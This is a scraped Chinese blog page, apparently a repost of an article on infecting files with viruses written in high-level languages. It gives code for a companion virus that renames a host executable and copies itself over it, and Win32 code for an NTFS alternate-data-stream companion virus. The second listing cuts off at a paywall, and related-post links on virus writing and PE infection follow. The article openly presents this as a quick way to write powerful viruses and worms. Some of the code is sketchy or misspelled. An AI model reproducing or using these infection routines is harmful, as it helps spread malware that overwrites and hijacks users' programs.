高级语言实现文件感染的方法

最新推荐文章于 2021-02-23 21:36:53 发布
最新推荐文章于 2021-02-23 21:36:53 发布
阅读量1.3k 收藏 2
点赞数 1
分类专栏: 病毒汇编和调试逆向技术加脱壳 文章标签: 语言 null image fp file path
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/2452621
版权

用高级语言感染文件是快速编写功能强大的病毒或者蠕虫的一条途径,本文将讲述近年来出现的一系列高级语言实现的文件感染方法。这里不提任何使用汇编代码和pe文件插入的技术。

一.文件伴侣
所谓文件伴侣病毒,在Windows时代也有一些不同的定义,所谓伴侣就是改名原文件,然后把自己Copy过去覆盖原文件,运行时创建伴侣进程。
原理性代码:
Copy code
void FrInfect(char *source)
{
char frvv[512];
strcpy(frvv,source);
strcat(frvv,"vv");
copyfile(source,frvv,0);
copyfile(myself,soourc,0);
return ;
}
void FrMain()
{
char host[512];
getselfpath(myself); //自身文件全路径,可用GetModuleFileName取
strcpy(host,myself);
strcat(host,"vv");//伴侣名字
CreatePrc(host,GetCommandLine());//创建伴侣进程,不要忘记命令参数传入~~
search(diskpp)
{
FrInfect(diskpp);//伴侣感染
}
return ;
}



二.NTFS流伴侣
利用NTFS文件流做伴侣病毒的也是有,比如29A的Benny写的Win2k.Stream病毒,
其实貌似很高深的NTFS流是很简单的东西,大家可以Google出大量相关资料。这里就不多说了,仅以代码说明问题:
TCHAR szMyName[MAX_PATH];//主程序名字~
TCHAR szMyNameR[MAX_PATH];//主程序名字~
TCHAR FileNameA[MAX_PATH]="xx.exe";
GetModuleFileName(NULL,szMyName,MAX_PATH);
char *pcmd = GetCommandLine();
char *torun = strcat(szMyName,":str.exe");
GetModuleFileName(NULL,szMyNameR,MAX_PATH);
STARTUPINFO si;
PROCESS_INFORMATION pi;
GetStartupInfo(&si);
CreateProcess(torun,pcmd,0,0,0,0,0,0,&si,&pi);
MessageBox(NULL,"这是一个病毒,你可以选择齐腰感染的文件,也可不选~","概念流病毒1.0",0x1000);
OPENFILENAME file = {0};
file.lStructSize = sizeof(file);
file.lpstrFile = FileNameA;
file.nMaxFile = MAX_PATH;
file.lpstrFilter = "EXE Files(*.exe)/0*.exe/0All Files/0*.*/0/0";
file.nFilterIndex = 1;
if (::GetOpenFileName(&file))
{
HANDLE op=CreateFile(FileNameA,GENERIC_READ|GENERIC_WRITE,NULL,NULL,OP
最低0.47元/天 解锁文章
iiprogram
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
通过C编程实现病毒的文件感染功能…
Confession 的技术频道
01-23 1695
编程学着不是让你领教它的枯燥无味的,是让你灵活的用它的,让人们凌驾于计算机的智慧之上,用它把你的生活变得更简单,让不完美的世界更完美,看到了很多人自己写程序表白,的确可以做出很多浪漫。     你还可以拿着它玩出各种花样,别说你能力不够,那只是你对自己懒于思考,懒于学习的借口,世上无难事只怕有心人!奉上用C编程实现简易病毒的感染功能,别人能用很高级很复杂方式做到的事情,我同样能拿着最基层的方式做到
c语言pe文件感染,C语言怎么获得进程的PE文件信息
weixin_42613017的博客
05-26 128
一、打印Sections信息。下面的程序打印出Windows_Graphics_Programming 1.1中第三个程序“Hello World Version 3:Create a Full-Screen Window"生成的可执行文件的Sections结构字节的信息#include#includechar *strPath="C:/c1_hwv3/Debug/c1_hwv3.exe";int...
如何实现可执行文件感染
云计算?
04-11 157
做了一个小程序实现的是对可执行程序的感染,原理很简单.test.exe是我们要感染文件,我们要把我们自己的一个文件添加到其前面去,就实现了如果用户点击这一文件,先执行我们的程序. 其相关代码如下: #include<iostream.h>#include<stdio.h>#include<conio.h> void main(){FILE *fp ;FI...
文件感染C++代码
05-05
PE 文件感染WIN32CPP代码,仅作学习交流,请勿用于其他用途!
如何用C语言编写病毒‘
weixin_34265814的博客
10-26 836
怎样用C语言编写病毒在分析病毒机理的基础上,用C语言写了一个小病毒作为实例,用TURBOC2.0实现.[Abstract] This paper introduce the charateristic of the computer virus,then show a simple example written by TURBOC2.0.一、什么是病毒 恶意软件可能是第一个对我们产生影响的计算机...
U盘感染_C#_c_C++_U盘感染_
09-30
2. C:作为C++的前身,是一种中级语言,兼顾了高级语言和低级语言的特点,常用于系统开发和嵌入式系统。它的语法简洁,对内存管理有直接控制,但需要程序员手动管理内存。 3. C#:是由微软公司推出的面向对象的编程...
语言插节感染源码-易语言
06-13
2. 文件操作:在实现插节感染的过程中,需要读取和写入文件,因此掌握易语言中的文件流操作至关重要。这包括打开、关闭、读取和写入文件方法。 3. 指针与内存操作:恶意代码通常通过修改内存中的指令来实现插节...
计算机高级考试题库.pdf
最新发布
11-30
16. 控制病毒感染的最好方法是安装最新的防火墙并开启实时监控。 17. 密码技术是信息安全技术的核心和关键。 18. 常见的国产杀毒软件有金山毒霸、瑞星、KV系列等。 19. 程序通常安装在计算机的硬盘上。 20. CPU代表...
感染PE文件示例源码(C++与汇编)
03-25
C++是一种高级编程语言,它提供了丰富的库和抽象,使得编写PE文件感染代码相对容易。在C++中,可以使用如`WinAPI`这样的函数接口来操作文件和内存,获取和修改PE头信息,以及在目标文件中插入代码。 汇编语言,尽管...
高级程序设计语言编写的程序称定义.pdf
11-08
17. 高级语言编译:高级语言编写的程序需要经过编译器编译成机器语言,然后连接成可执行程序。 18. 数据通信系统技术指标:传输速率是衡量数据通信系统性能的重要指标。 19. 写盘操作:将内存中的数据传送到硬盘被...
过滤文件名--OPENFILENAME
03-20
过滤文件名--OPENFILENAME lpstrFilter 名字的组合。 OpenFileName.lpstrFilter = “选择升级文件\0updatefilename20100320001.tar.update\0”;
Get-HttpSecHead:此cmdlet将从目标Web服务器获取HTTP标头,并测试各种与安全性相关的HTTP标头的存在,并显示cookie信息
05-13
获取HttpSecHead 此cmdlet将从目标Web服务器获取HTTP标头,并测试各种与安全性相关的HTTP标头的存在,并显示cookie信息。
java模拟病毒传染_模拟细菌(病毒)传播(java作业)
weixin_39855568的博客
02-23 403
学习java到现在差不多11天了,老师留了个作业,模拟病毒复制:1.如果病毒周围有其他的病毒,并且有空气,则病毒繁殖到空气的位置上;2.如果病毒周围全是病毒,则病毒会因为呼吸不到空气死亡;3.如果病毒周围全是空气,则病毒会因为孤独至死。下面具体实现:新建一个Germ类:/*** @(#)germ.java*** @author LiuJie* @version 1.00 2007/4/13*/p...
感染PE文件源码
哈哈Delphi学习空间
04-25 647
program XX;{$APPTYPE CONSOLE}usesSysUtils,Windows,ShellApi,TlHelp32;//-----------------------DETERMINE PROCESS EXISTANCE-----------------------------function process_exists(exeFileName: string): Boole
delphi 简单PE文件感染源码!
期待下集是个可爱梦儿
02-27 684
<br />文件感染是木马故有的特征,其实实现这样的功能并不难!下面是一个简单实例的源码:<br />procedure copy(s:string);///S:目标文件完整文件名(带路径的)<br />var<br />s1,s2,s3:tmemorystream; //内存流<br />file1:tfilestream;//文件流<br />id:integer;<br />iid:longint;<br />const<br />id=$66666666;//感染标识<br />begin<br /
使用高级语言编写病毒型木马
2195的专栏
08-31 1332
使用高级语言编写病毒型木马 作者:未知       今天无意在yahoo中搜索了一下QQHacker2.0,竟然发现到处都有他的下载点,让我大感意外,QQhacker其实只是我在学习病毒过程中的一个付产品,今天看到用的人不少,决定把QQHacker中用到的一些技术写下来,希望能对大家在学习的过程中会有所帮助。与以前的写作风格一样,尽量使用最简单的例子,最简洁的词汇,表达最清楚的思想
文件感染
weixin_30549657的博客
01-29 106
#include<stdlib.h>#include<stdio.h>typedef struct node{ int id; int fileSize; int origSize; int isFolder; struct node *parent; struct node *child; struct node *next; struct node *brother;}...
病毒编程技术-2
feijj2002_的专栏
09-12 2416
* Windows平台和PE文件格式          Windows平台是当今最为流行的桌面系统,在服务器市场上,也占有相当的份额。其可执行文件(普通的用户程序、共享库以及NT系统的驱动文件)采用的是PE(Portable Executebale)文件格式。病毒要完成各种操作,在Windows系统上一般都是通过调用系统提供的API进行的,以保证在各种Windows版本上都能运行,因此读者应对基本
CobaltStrike:渗透测试与高级攻击模拟工具
2. **武器化文档**:CobaltStrike允许安全专家将常规文档转化为恶意载体,例如通过植入恶意JavaApplet、Word文档中的宏,或生成执行Payload的可执行文件。这些用户驱动的攻击手段在渗透测试中十分有效。 3. **鱼叉...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值